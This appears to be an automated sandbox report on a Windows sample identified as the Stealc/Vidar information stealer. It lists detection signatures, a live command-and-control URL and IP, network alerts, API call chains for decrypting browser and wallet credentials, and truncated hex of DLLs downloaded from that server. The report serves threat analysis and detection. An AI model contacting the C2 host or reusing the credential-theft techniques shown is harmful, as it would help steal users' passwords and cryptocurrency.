Windows Analysis Report
t13pv4ox18.exe

Overview

General Information

Sample name: t13pv4ox18.exe
renamed because original name is a hash value
Original sample name: 9e043bf883afea72eecbb853b28b21f6.exe
Analysis ID: 1436379
MD5: 9e043bf883afea72eecbb853b28b21f6
SHA1: 18f4bf91d87dc6b968c086a782777ddcdab66c13
SHA256: 806e53a683ec3126336abe61b387f8f9f94d7bae0b0f2389751764f8b4ab18ec
Tags: 32exeMarsStealertrojan
Infos:

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: t13pv4ox18.exe Avira: detected
Found malware configuration
Source: 00000000.00000003.1985985133.0000000003670000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.151/7043a0c6a68d9c65.php"}
Source: t13pv4ox18.exe.2788.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.172.128.151/7043a0c6a68d9c65.php"}
Multi AV Scanner detection for domain / URL
Source: http://185.172.128.151/7043a0c6a68d9c65.php$ Virustotal: Detection: 14% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.php8 Virustotal: Detection: 13% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.php0 Virustotal: Detection: 13% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.phpnts Virustotal: Detection: 10% Perma Link
Source: http://185.172.128.151/8420e83ceb95f3af/softokn3.dll Virustotal: Detection: 17% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.phpD Virustotal: Detection: 16% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.php Virustotal: Detection: 18% Perma Link
Source: http://185.172.128.151/8420e83ceb95f3af/sqlite3.dll Virustotal: Detection: 19% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.phpBrowser Virustotal: Detection: 10% Perma Link
Source: http://185.172.128.151/8420e83ceb95f3af/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.phpn Virustotal: Detection: 13% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.phpP Virustotal: Detection: 17% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.phpH Virustotal: Detection: 14% Perma Link
Source: http://185.172.128.151/8420e83ceb95f3af/mozglue.dll Virustotal: Detection: 6% Perma Link
Source: 185.172.128.151/7043a0c6a68d9c65.php Virustotal: Detection: 18% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.phpx Virustotal: Detection: 10% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.phpv Virustotal: Detection: 14% Perma Link
Multi AV Scanner detection for submitted file
Source: t13pv4ox18.exe ReversingLabs: Detection: 50%
Source: t13pv4ox18.exe Virustotal: Detection: 43% Perma Link
Machine Learning detection for sample
Source: t13pv4ox18.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: CtIvEWInDoW
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: AgEBOxw
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: ijklmnopqrs
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: /#%33@@@
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: abcdefghijklmnopqrs
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: @@@@<@@@
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: abcdefghijklmnopqrs
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/|
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: %s\%V/yVs
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: %s\*.
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: }567y9n/S
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: ntTekeny
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: ging
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: PassMord0
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: J@@@`z`@J@@@J@@@
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: OPQRSTUVWXY
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: 456753+/---- '
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: '--- '
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: i|a{
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: HeapFree
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: ntProcessId
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: wininet.dll
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: shell32.dll
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: .dll
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: wrcd:
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: column_text
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: H"=y
Source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack String decryptor: login:
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00409540
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_004155A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00406C10
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_004094A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040BF90
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C766C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C766C80
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C8BA9A0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8B44C0 PK11_PubEncrypt, 0_2_6C8B44C0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C884420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C884420
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C8B4440 PK11_PrivDecrypt, 0_2_6C8B4440
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C9025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C9025B0
Source: https://ogs.google.com/widget/app/so?awwd=1&gm3=1&origin=chrome-untrusted%3A%2F%2Fnew-tab-page&origin=chrome%3A%2F%2Fnew-tab-page&cn=app&pid=1&spid=243&hl=en HTTP Parser: No favicon

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Unpacked PE file: 0.2.t13pv4ox18.exe.400000.0.unpack
Uses 32bit PE files
Source: t13pv4ox18.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49727 version: TLS 1.0
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.151.9:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.151.9:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.151.9:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: t13pv4ox18.exe, 00000000.00000002.2465277640.000000006C7CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: t13pv4ox18.exe, 00000000.00000002.2465468623.000000006C98F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: t13pv4ox18.exe, 00000000.00000002.2465277640.000000006C7CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49704 -> 185.172.128.151:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49704 -> 185.172.128.151:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.151:80 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49704 -> 185.172.128.151:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.151:80 -> 192.168.2.5:49704
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.172.128.151/7043a0c6a68d9c65.php
Source: Malware configuration extractor URLs: http://185.172.128.151/7043a0c6a68d9c65.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:00:56 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:01:03 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 04 May 2024 22:01:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 